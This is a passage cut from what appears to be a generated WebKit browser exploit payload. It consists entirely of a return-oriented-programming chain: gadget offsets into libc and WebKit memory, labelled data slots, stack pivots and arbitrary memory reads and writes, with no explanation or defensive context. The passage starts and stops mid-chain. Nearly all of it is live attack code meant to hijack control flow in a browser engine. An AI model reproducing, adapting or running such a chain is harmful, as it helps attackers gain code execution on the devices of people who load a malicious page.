libc_base+764760, //pop rsi ropchain+280272, //L5343 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+280256, //L5341 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5341: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5343: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+280384, //L5344 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+280416, //L5346 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+280400, //L5345 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 
//pop rcx ]); //L5344: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5345: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5346: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+764760, //pop rsi ropchain+280584, //L5349 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+755774, //mov rax, rsi libc_base+764760, //pop rsi ropchain+280552, //L5347 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+280568, //L5348 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5347: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5348: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5349: db([0, 0]); // 0x0 set_gadget(webkit_base+1438842,); //pop rdx db([0, 0]); // 0x0 set_gadgets([ webkit_base+24132920, //div rsi ; add rax, rcx libc_base+428453, //mov rax, rdx libc_base+764760, //pop rsi ropchain+280768, //L5353 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+755774, //mov rax, rsi libc_base+764760, //pop rsi ropchain+280736, //L5351 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+280752, //L5352 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5350: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5351: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5352: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5353: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+280824, //L5355 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5355: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, 
//sar edi, cl libc_base+764760, //pop rsi ropchain+280952, //L5357 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+280968, //L5358 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+280936, //L5356 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5356: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5357: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5358: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+281048, //L5359 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+281064, //L5360 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5359: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5360: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+281152, //L5361 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+281168, //L5363 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5361: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5363: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5364: db([4294967255, 4294967295]); // -0x29 set_gadgets([ libc_base+501454, //add rax, rsi webkit_base+1121481, //mov [rax], cl libc_base+731401, //mov rax, r8 libc_base+764760 //pop rsi ]); //L5366: db([4294967255, 4294967295]); // -0x29 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+281328, //L5369 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+281312, //L5367 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5367: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5369: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+281488, //L5373 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+281456, //L5371 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+281472, //L5372 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5370: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5371: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5372: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5373: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+281544, //L5375 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5375: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+281672, //L5377 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+281688, //L5378 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+281656, //L5376 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5376: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5377: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5378: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+281848, //L5382 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+281816, 
//L5380 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+281832, //L5381 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5379: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5380: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5381: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5382: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+281904, //L5384 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5384: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+282032, //L5386 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+282048, //L5387 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+282016, //L5385 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5385: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5386: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5387: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+282128, //L5388 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+282144, //L5389 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5388: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5389: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+282240, //L5391 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+282224, //L5390 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5390: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5391: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+282320, //L5392 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5392: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5393: db([10, 0]); // 0xa set_gadget(libc_base+144605,); //pop rdi //L5394: db([10, 0]); // 0xa set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+282464, //L5395 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+282496, //L5397 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+282480, //L5396 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5395: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5396: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5397: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+6378709, //cmp rax, rcx ; sete al webkit_base+5168252, //setl al libc_base+226597, //movzx eax, al libc_base+764760, //pop rsi ropchain+282672, //L5399 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+282688, //L5400 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+282656, //L5398 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 
]); //L5398: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5399: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5400: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+282800, //L5402 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+282848, //L5405 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+282816, //L5403 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+3236123 //pop r9 ]); //L5402: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5403: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5404: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5405: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+282960, //L5406+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+282952, //L5406 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5406: db([0, 0]); // 0x0 set_gadgets([ ropchain+282976, //L5406+24 ropchain+284112, //L5401 libc_base+759608 //pop rax ]); //L5407: db([48, 0]); // 0x30 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+283064, //L5408 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5408: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5410: db([4294967255, 4294967295]); // -0x29 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+283184, //L5413 
webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+283168, //L5411 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5411: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5413: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+283344, //L5417 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+283312, //L5415 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+283328, //L5416 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5414: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5415: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5416: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5417: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+283400, //L5419 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5419: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+283528, //L5421 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+283544, //L5422 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+283512, //L5420 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5420: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5421: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5422: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+283704, 
//L5426 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+283672, //L5424 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+283688, //L5425 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5423: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5424: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5425: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5426: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+283760, //L5428 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5428: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+283888, //L5430 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+283904, //L5431 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+283872, //L5429 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5429: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5430: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5431: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+284016, //L5432 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+284048, //L5434 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+284032, //L5433 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5432: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi 
//L5433: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5434: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+755660, //add rax, rcx libc_base+782311, //pop rsp ropchain+286504, //L5435 //L5401: libc_base+764760, //pop rsi ropchain+284152, //L5436 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5436: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5438: db([88, 0]); // 0x58 set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+284272, //L5441 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+284256, //L5439 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5439: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5441: db([0, 0]); // 0x0 set_gadgets([ libc_base+224145, //mov eax, [rdi] libc_base+764760, //pop rsi ropchain+284448, //L5444 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+284464, //L5445 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+284416, //L5442 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+284432, //L5443 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5442: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5443: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5444: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5445: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi 
ropchain+284560, //L5447 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+284544, //L5446 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+144605 //pop rdi ]); //L5446: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5447: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5448: db([1, 0]); // 0x1 set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+759608 //pop rax ]); //L5449: db([5, 0]); // 0x5 set_gadget(libc_base+763368,); //pop rcx //L5450: db([5, 0]); // 0x5 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760 //pop rsi ]); db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+284760, //L5452 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5452: db([0, 0]); // 0x0 set_gadgets([ libc_base+225585, //mov rax, [rdi] libc_base+764760, //pop rsi ropchain+284816, //L5453 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5453: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi db([4294967288, 4294967295]); // -0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi webkit_base+14664103, //and rax, rcx libc_base+764760, //pop rsi ropchain+284952, //L5457 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+284936, //L5456 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5455: db([32, 0]); // 0x20 set_gadget(webkit_base+3236123,); 
//pop r9 //L5456: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5457: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+848080, //shr rax, cl libc_base+764760, //pop rsi ropchain+285088, //L5460 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+285120, //L5462 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+285072, //L5459 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5459: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5460: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5461: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5462: db([0, 0]); // 0x0 set_gadgets([ webkit_base+21212296, //cmp rax, rsi ; sete al libc_base+226597, //movzx eax, al webkit_base+5507491, //shl rax, 3 libc_base+764760, //pop rsi ropchain+285232, //L5463+8 libc_base+501454, //add rax, rsi libc_base+501611, //mov rax, [rax] libc_base+764760, //pop rsi ropchain+285224, //L5463 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+782311 //pop rsp ]); //L5463: db([0, 0]); // 0x0 set_gadgets([ ropchain+285248, //L5463+24 ropchain+285280, //L5458 libc_base+759608 //pop rax ]); //L5465: db([65, 0]); // 0x41 set_gadgets([ libc_base+782311, //pop rsp ropchain+285296, //L5464 //L5458: libc_base+759608 //pop rax ]); //L5466: db([97, 0]); // 0x61 //L5464: set_gadget(libc_base+764760,); //pop rsi db([8, 0]); // 0x8 set_gadgets([ libc_base+201260, //sub rdi, rsi ; mov rdx, rdi libc_base+426295, //mov [rdi], rax libc_base+764760, //pop rsi ropchain+285368, //L5467 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+731401, //mov rax, r8 libc_base+763368 //pop rcx ]); //L5467: db([0, 0]); // 0x0 set_gadget(libc_base+764760,); //pop rsi //L5469: db([4294967255, 4294967295]); // -0x29 
set_gadgets([ libc_base+501454, //add rax, rsi libc_base+764760, //pop rsi ropchain+285488, //L5472 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+285472, //L5470 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+763368 //pop rcx ]); //L5470: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5472: db([0, 0]); // 0x0 set_gadgets([ libc_base+223440, //mov al, [rdi] libc_base+764760, //pop rsi ropchain+285648, //L5476 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+764760, //pop rsi ropchain+285616, //L5474 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+285632, //L5475 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5473: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5474: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5475: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5476: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+285704, //L5478 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5478: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+285832, //L5480 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+285848, //L5481 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+285816, //L5479 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5479: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5480: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5481: db([0, 0]); // 0x0 
set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+286008, //L5485 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+853989, //mov rax, rcx libc_base+764760, //pop rsi ropchain+285976, //L5483 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+285992, //L5484 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5482: db([24, 0]); // 0x18 set_gadget(webkit_base+3236123,); //pop r9 //L5483: db([0, 0]); // 0x0 set_gadget(libc_base+144605,); //pop rdi //L5484: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5485: db([0, 0]); // 0x0 set_gadgets([ libc_base+848070, //shl rax, cl libc_base+764760, //pop rsi ropchain+286064, //L5487 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+384176, //mov rax, rdi libc_base+144605 //pop rdi ]); //L5487: db([0, 0]); // 0x0 set_gadgets([ libc_base+478984, //sar edi, cl libc_base+764760, //pop rsi ropchain+286192, //L5489 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+286208, //L5490 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+286176, //L5488 webkit_base+660161, //mov [rsi], rax ; mov al, 1 libc_base+763368 //pop rcx ]); //L5488: db([0, 0]); // 0x0 set_gadget(webkit_base+3236123,); //pop r9 //L5489: db([0, 0]); // 0x0 set_gadget(libc_base+759608,); //pop rax //L5490: db([0, 0]); // 0x0 set_gadgets([ webkit_base+15691302, //movsxd rax, edi libc_base+764760, //pop rsi ropchain+286320, //L5491 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2002592, //mov rax, [rsi] libc_base+764760, //pop rsi ropchain+286352, //L5493 webkit_base+660161, //mov [rsi], rax ; mov al, 1 webkit_base+2757671, //mov rax, r9 libc_base+764760, //pop rsi ropchain+286336, //L5492 webkit_base+660161, //mov [rsi], rax ; mov al, 1 
